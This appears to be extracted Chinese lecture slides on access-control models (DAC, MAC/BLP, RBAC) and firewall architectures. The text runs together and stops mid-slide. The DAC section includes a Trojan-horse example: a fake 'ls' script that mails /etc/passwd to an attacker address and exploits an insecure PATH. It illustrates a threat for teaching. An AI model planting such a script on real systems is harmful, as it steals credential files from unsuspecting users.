访问控制原理与防火墙技术资料讲解

访问控制原理与防火墙技术主要内容6.1.1访问控制的基本概念6.1.2基本的访问控制政策模型2访问控制的基本概念什么是访问控制访问控制的基本模型访问控制和其他安全机制的关系3访问控制的基本概念主体(Subject)主体是一个主动的实体，它提出对资源访问请求。如用户，程序，进程等。客体(Object)含有被访问资源的被动实体，如网络、计算机、数据库、文件、目录、计算机程序、外设、网络。访问（Access）对资源的使用，读、写、修改、删除等操作，例如访问存储器；访问文件、目录、外设；访问数据库；访问一个网站。4访问控制的基本概念访问可以被描述为一个三元组(s,a,o)主体，发起者:Subject，Initiator客体，目标:Object,Target访问操作:AccessObjectRead/Write/Exec5访问控制模型访问控制执行功能

（AEF）访问控制决策功能

（ADF）客体主体的访问控制信息主体客体的访问控制信息访问控制政策规则上下文信息(如时间，地址等)决策请求决策访问请求提交访问6访问控制的基本概念访问控制信息（ACI）的表示主体访问控制属性客体访问控制属性访问控制政策规则授权（Authorization）怎样把访问控制属性信息分配给主体或客体如何浏览、修改、回收访问控制权限访问控制功能的实施控制实施部件如何获得实体的访问控制信息怎样执行7访问控制矩阵访问控制机制可以用一个三元组来表示（S,O,M）主体的集合S={s1,s2,…,sm}客体的集合O={o1,o2,…,on}所有操作的集合A={R,W,E,…}访问控制矩阵M=S×O2A8访问控制矩阵矩阵的的i行Si表示了主体si对所有客体的操作权限，称为主体si的能力表(CapabilityList)矩阵的第j列Oj表示客体oj允许所有主体的操作，称为oj的访问控制表（ACL）9能力表（CapabilityList）能力表与主体关联，规定主体所能访问的客体和权限。表示形式：用户Profile，由于客体相当多，分类复杂，不便于授权管理授权证书，属性证书从能力表得到一个主体所有的访问权限，很容易从能力表浏览一个客体所允许的访问控制权限，很困难O1RWO2RO5RWESi10访问控制表（AccessControlList）访问控制表与客体关联，规定能够访问它的主体和权限由于主体数量一般比客体少得多而且容易分组，授权管理相对简单得到一个客体所有的访问权限，很容易浏览一个主体的所有访问权限，很困难S1RWS2RS5RWEOj11访问控制表（Windows）12授权信息访问控制与其他安全机制的关系认证、授权、审计（AAA）Log身份认证访问控制审计授权（authorization）主体客体13访问控制与其他安全机制的关系身分认证身份认证是访问控制的前提保密性限制用户对数据的访问（读取操作）可以实现数据保密服务完整性限制用户对数据的修改，实现数据完整性保护可用性限制用户对资源的使用量，保证系统的可用性安全管理相关的活动访问控制功能通常和审计、入侵检测联系在一起14主要内容访问控制的基本概念基本的访问控制政策模型15访问控制政策模型自主型访问控制（DAC）强制型访问控制(MAC)基于角色的访问控制（RBAC）16自主型访问控制政策DiscretionaryAccessControl,DAC每个客体有一个属主，属主可以按照自己的意愿把客体的访问控制权限授予其他主体DAC是一种分布式授权管理的模式控制灵活，易于管理，是目前应用最为普遍的访问控制政策17自主型访问控制政策/bin/ls[root@acltmp]#chownrootls[root@acltmp]#ls-l-rw-r--r-- 1nobody nobody 770Oct1815:164011.tmp-rw------- 1root users 48Oct2811:41lssrwxrwxrwx 1root root 0Aug2909:04mysql.sockdrwxrwxr-x 2duan uan 4096Oct2323:41ssl[root@acltmp]#chmodo+rwls[root@acltmp]#ls-l-rw-r--r-- 1nobody nobody770Oct1815:164011.tmp-rw----rw- 1root users48Oct2811:41lssrwxrwxrwx 1root root0Aug2909:04mysql.sockdrwxrwxr-x 2duan duan4096Oct2323:41ssl[root@acltmp]#18自主型访问控制(DAC)

无法控制信息流动信息在移动过程中其访问权限关系会被改变。如用户A可将其对目标O的访问权限传递给用户B,从而使不具备对O访问权限的B可访问O。特洛伊木马的威胁特洛伊木马（Trojan）是一段计算机程序，它附在合法程序的中，执行一些非法操作而不被用户发现特洛伊木马举例：#cat>/tmp/ls

mailhacker@</etc/passwd/bin/lsCtrl+D#chmoda+x/tmp/ls如果用户的路径设置不安全，如path=./:/usr/bin:/usr/sbin:/usr/local/bin#cd/tmp#ls19强制型访问控制（MAC）MandatoryAccessControl每个主体和客体分配一个固定的安全级别，只有系统管理员才可以修改Clearance，classification,sensitivityUnclassified<confidential<secret<topsecret普密<秘密<机密<绝密只有在主体和客体的安全级别满足一定规则时，才允许访问20强制型访问控制（续）BLP模型禁止向下写：如果用户的级别比要写的客体级别高，则该操作是不允许的禁止向上读：如果主体的级别比要读的客体级别低，则该操作是不允许的。向下写是不允许的向上读是不允许的21强制型访问控制（续）TSSCUTSSCUR/WWR/WRR/WRWRRRR/WRWWWWSubjectsObjects信息流向BLP模型的信息流22基于角色的访问控制(RBAC)用户组（group）用户组：用户的集合G={s1,s2,s3…}授权管理：把用户分组，把访问权限分配给一个用户组；角色（Role）角色是完成一项任务必须访问的资源及相应操作权限的集合，R={(a1,o1),(a2,o2),(a3,o3)…}授权管理：根据任务需要定义角色，为角色分配资源和操作权限给一个用户指定一个角色23基于角色的访问控制（RBAC）角色的继承关系RBAC的优势便于授权管理便于责任划分参考文献：RaviS.SandhuRole-BaseAccessControlModel,Computer,Feb.1996/rbac/ProjectSupervisorTestEngineerProgrammerProjectMember246.2防火墙技术

25主要内容6.2.1防火墙的基本概念6.2.2防火墙的几种技术6.2.3防火墙的配置结构6.2.4防火墙的设计26防火墙的基本概念防火墙是在两个网络(通常是用户内部网络和Internet)之间实施访问控制政策的一个或一组系统（硬件、软件的组合）所有进入和离开的数据都必须经过防火墙的检查，只有符合访问控制政策的数据才允许通过27防火墙可以做什么防火墙可以在网络边界实施访问控制政策防火墙可以记录所有的访问防火墙可以隐藏内部网络28防火墙不可以做什么防火墙自身不会正确的配置，需要用户定义访问控制规则防火墙不能防止内部恶意的攻击者防火墙无法控制没有经过它的连接防火墙无法防范全新的威胁和攻击防火墙不能很好的实现防病毒29关于防火墙的争论防火墙破坏了Internet端到端的特性，阻碍了新的应用的发展防火墙没有解决主要的安全问题，即网络内部的安全问题防火墙给人一种误解，降低了人们对主机安全的意识30主要内容5.2.1防火墙的基本概念5.2.2防火墙的几种技术5.2.3防火墙的配置结构5.2.4防火墙的设计31防火墙技术物理层链路层包过滤、地址转换电路层网关应用层代理内部网络外部网络包过滤技术(Packetfiltering/screening)电路层网关(Socks)应用层代理(Proxy)地址转换（NAT）32包过滤技术(Packetfiltering)工作在网络层，称为Packetfilter,screenrouter基于以下信息对经过的每一个包进行检查：IP源地址和目标地址协议(TCP,UDP,ICMP,BGP等)TCP/UDP源端口号和目标端口号ICMP的消息类型包的大小常见包过滤设备/软件路由器访问控制表ACL硬件包过滤设备软件：ipchains/netfilter33包过滤技术(Packetfiltering)优点可以保护所有的服务对应用透明较高的网络性能成本较低缺点无法实施细粒度的访问控制政策现有的工具不完善规则配置复杂降低路由器的性能34电路层网关（CircuitGateway）工作在传输层/会话层根据数据包的标志位建立一个连接状态表对于收到的某个IP包，检查它是否属于某一个会话？跟踪一段时间内一个会话中经过包的总数常见设备/软件商业防火墙硬件/软件免费软件：Socksd:相关标准rfc1928.txt35电路层网关（CircuitGateway）优点支持所有TCP应用保持状态，可以检测、防范SYNFlood类型的攻击隐藏内部网络缺点不支持UDP的应用对应用不透明，应用软件必须经过socksified才能使用防火墙保持状态，可能造成网络中断性能的开销较大防火墙本身易受DOS攻击36应用层代理（Proxy）工作在应用层(ApplicationLayer)应用/协议相关(Protocolspecific),比如telnet,http,smtp,pop,ftpproxy等可以支持身份认证功能除了基于地址、协议、端口的控制以外，还可以支持应用层命令的过滤，比如FTP的GET,PUT等常用软件：squid,wingate,Netscape,MSISA等物理层链路层网络层传输层ServerClienttelnet

Clienttelnet

Server37应用层代理（Proxy）优点功能强大：用户认证、细粒度的访问控制对于Web应用，提供内容缓存功能（cache）缺点协议相关的，需要对每一种应用协议编写Proxy程序必须修改应用程序通用计算机/软件实现，影响网络性能38地址转换（NAT）类似路由器，工作在网络层。除了转发以外，完成地址转换不能提供额外的安全性，但是可以隐蔽内部网络，节省地址空间地址转换设备39转换方式静态地址转换动态地址转换静态地址转换＋端口映射（PortMapping）动态地址转换＋端口映射:1025地址转换设备:2028:2029:102540地址转换优点节省IP地址资源隐蔽内部的网络缺点地址转换破坏了IP包的完整性，破坏了Internet端到端的特性动态地址转换必须保留状态，破坏了网络无状态的特性Log变得困难端口映射使得包过滤变得困难41主要内容5.2.1防火墙的基本概念5.2.2防火墙的几种技术5.2.3防火墙的配置结构5.2.4防火墙的设计42防火墙的配置结构（FirewallArchitecture)单盒结构（Single-BoxArchitecture）屏蔽主机结构(ScreenedHostArchitecture)屏蔽子网结构(ScreenedSubnetArchitecture)43单盒结构（SingleBoxArchitecture）屏蔽路由器（ScreeningRouter）简单的包过滤功能优点：投资小，配置简单，没有增加单一故障点缺点：在ACL较多时，影响路由器的性能适用于如下环境网络内部的主机安全性比较好，规则简单对性能、可靠性要求比较高InsideOutside44单盒结构（SingleBoxArchitecture）双宿主机（DualHomeHost）至少有两块网卡的通用计算机系统可以是包过滤软件/硬件、电路层网关、应用层代理增加了单一故障点，影响网络吞吐量适用于如下应用环境去往Internet的流量比较小对可靠性要求不高不对外提供服务InsideOutside45屏蔽主机结构屏蔽路由器堡垒主机一台暴露在外部网络的攻击之下的计算机，要求安全性配置比较好的计算机。适用于只对外提供较少的服务，外部的来的连接比较少内部主机安全性配置较好OutsideFirewallscreening

routerBastionHost46屏蔽子网结构47屏蔽子网结构外部路由器只允许对DMZ的访问拒绝所有以内部网络地址为源地址的包进入内部网络拒绝所有不以内部网络地址为原地址的包离开网络DMZ(Demilitarizedzone),不设防区通常放置DNS,Web,Email,FTP，ProxyServer等内部路由器保护内部网络，防止来自Internet或DMZ的访问内部网络一般不对外部提供服务，所以拒绝外部发起的一切连接，只允许内部对外的访问48主要内容5.2.1防火墙的基本概念5.2.2防火墙的几种技术5.2.3防火墙的配置结构5.2.4防火墙的设计49防火墙设计定义你的需求防火墙产品的评价如何把这些产品组合在一起？50定义你的需求Youshouldfingeroutexactlywhatyouneedbeforeyoustarttolookatfirewallproducts,becauseotherwiseyouriskbeinginfluencedmorebyadvertisingthanbyyourownsituation.Ifyoudon’tknowclearlywhatyouneed,theproductsthatyoulookatwillshapeyourdecisionsnomatterhowsuspiciousyouare.51定义你的需求你需要防火墙做什么？你的安全政策是什么：你要保护什么？哪些行为是允许的？哪些行为是禁止的？缺省允许原则与缺省拒绝原则你的用户